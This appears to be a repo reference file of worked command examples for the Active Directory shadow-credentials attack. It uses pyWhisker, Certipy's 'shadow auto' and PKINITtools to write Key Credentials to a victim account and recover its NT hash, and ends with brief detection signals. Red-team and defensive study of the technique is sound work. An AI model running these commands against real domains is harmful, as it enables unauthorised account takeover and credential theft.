creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-26 11:44:37 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
768ca51c8d331ab0bdcea8ffb31c9b99bb2c1839
Anthropic-Cybersecurity-Skills/skills/abusing-shadow-credentials-for-privesc/references/api-reference.md
T
mukul975 8cae0648ec Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817) 
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):

- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
  prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
  invocation, guardrails, model/data poisoning, system-prompt leakage,
  embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
  malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
  Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
  shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
  Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration

Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
2026-06-22 19:08:16 +02:00

69 lines
2.5 KiB
Markdown
Raw Blame History

# Shadow Credentials Tooling Reference
## pyWhisker (https://github.com/ShutdownRepo/pywhisker)
Invocation: `python3 pywhisker.py [auth] --target <obj> --action <action> [opts]`
| Flag | Meaning |
|------|---------|
| `-d DOMAIN` | Target domain (FQDN) |
| `-u USER` | Controlled username |
| `-p PASSWORD` | Password |
| `-k` / `--no-pass` | Kerberos auth (uses KRB5CCNAME) |
| `-H LM:NT` | Pass-the-hash |
| `--target NAME` | Target user/computer whose attribute is modified |
| `--action list` | Enumerate existing Key Credentials |
| `--action add` | Generate key pair, write Key Credential |
| `--action remove` | Remove one Key Credential by `--device-id` |
| `--action clear` | Remove all Key Credentials |
| `--action info` | Show details of a Key Credential |
| `--filename NAME` | Output PFX/PEM base name |
| `--export PEM|PFX` | Output format (default PFX) |
| `--device-id GUID` | Target device for remove/info |
| `--dc-ip IP` | Domain Controller IP |
| `--use-ldaps` | Use LDAPS (636) |
### Example
```bash
python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
--target victim --action add --filename victim_shadow
```
## Certipy `shadow` (https://github.com/ly4k/Certipy)
| Command | Meaning |
|---------|---------|
| `certipy shadow auto` | Add → PKINIT → dump NT hash → cleanup (end to end) |
| `certipy shadow add` | Add Key Credential only |
| `certipy shadow list` | List Key Credentials |
| `certipy shadow clear` | Clear Key Credentials |
| `certipy shadow info` | Show Key Credential info |
Key flags: `-u USER@DOMAIN`, `-p PW` / `-hashes :NT` / `-k -no-pass`,
`-dc-ip IP`, `-account TARGET` (use trailing `$` for computers), `-ns IP`, `-dns-tcp`.
### Example
```bash
certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'
```
## PKINITtools (https://github.com/dirkjanm/PKINITtools)
| Script | Purpose |
|--------|---------|
| `gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache` | Request TGT via PKINIT; prints AS-REP key |
| `getnthash.py -key <AS-REP-KEY> DOMAIN/USER` | Recover NT hash (KRB5CCNAME set) |
### Example
```bash
python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
corp.local/victim victim.ccache
export KRB5CCNAME=victim.ccache
python3 getnthash.py -key <AS-REP-KEY> corp.local/victim
```
## Detection signal
- Event ID 5136 — modification of `msDS-KeyCredentialLink` (Directory Service Changes auditing).
- BloodHound edge: `AddKeyCredentialLink`.
Reference in New Issue View Git Blame Copy Permalink